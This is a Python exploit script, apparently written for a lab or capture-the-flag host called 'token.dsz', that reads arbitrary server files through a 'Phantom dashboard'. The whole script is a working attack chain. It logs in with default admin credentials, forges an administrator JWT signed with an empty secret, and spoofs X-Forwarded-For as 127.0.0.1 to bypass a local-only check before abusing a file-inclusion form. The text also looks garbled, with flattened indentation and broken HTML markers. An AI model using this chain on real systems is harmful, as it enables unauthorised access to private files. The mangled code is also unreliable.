#!/usr/bin/env python3
import argparse
import html
import re
import sys
import time
import jwt
import requests
IP = "192.168.1.112"
HOST = "token.dsz"
ADMIN_USER = "admin"
ADMIN_PASS = "admin123"
def forge_token():
return jwt.encode(
{"user": ADMIN_USER, "role": "administrator", "iat": int(time.time())},
"",
algorithm="HS256",
)
def extract_file_content(body):
marker = "文件内容:
"
start = body.find(marker)
if start == -1:
return None
start += len(marker)
end = body.find("", start)
if end == -1:
return None
return html.unescape(body[start:end]).strip()
def extract_error(body):
match = re.search(r"错误:\s*([^<]+)", body)
if match:
return html.unescape(match.group(1)).strip()
denied = re.search(r'
([^<]+)
', body) if denied: return html.unescape(denied.group(1)).strip() return None def main(): parser = argparse.ArgumentParser(description="Read files through Phantom dashboard LFI") parser.add_argument("paths", nargs="+", help="absolute paths to read") args = parser.parse_args() session = requests.Session() headers = {"Host": HOST} login = session.post( f"http://{IP}/index.php", headers=headers, data={"user": ADMIN_USER, "pass": ADMIN_PASS, "login": ""}, allow_redirects=False, timeout=8, ) if login.status_code != 302: print(f"[-] Login did not redirect: HTTP {login.status_code}", file=sys.stderr) return 1 for cookie in list(session.cookies): if cookie.name == "auth_token": session.cookies.clear(cookie.domain, cookie.path, cookie.name) session.cookies.set("auth_token", forge_token(), path="/") read_headers = {"Host": HOST, "X-Forwarded-For": "127.0.0.1"} failed = 0 for path in args.paths: resp = session.post( f"http://{IP}/dashboard.php", headers=read_headers, data={"file_path": path}, timeout=8, ) content = extract_file_content(resp.text) print(f"===== {path} =====") if content is None: failed += 1 error = extract_error(resp.text) if error: print(f"[-] {error}") else: print(f"[-] Could not extract content, HTTP {resp.status_code}, {len(resp.text)} bytes") continue print(content) return 1 if failed == len(args.paths) else 0 if __name__ == "__main__": raise SystemExit(main())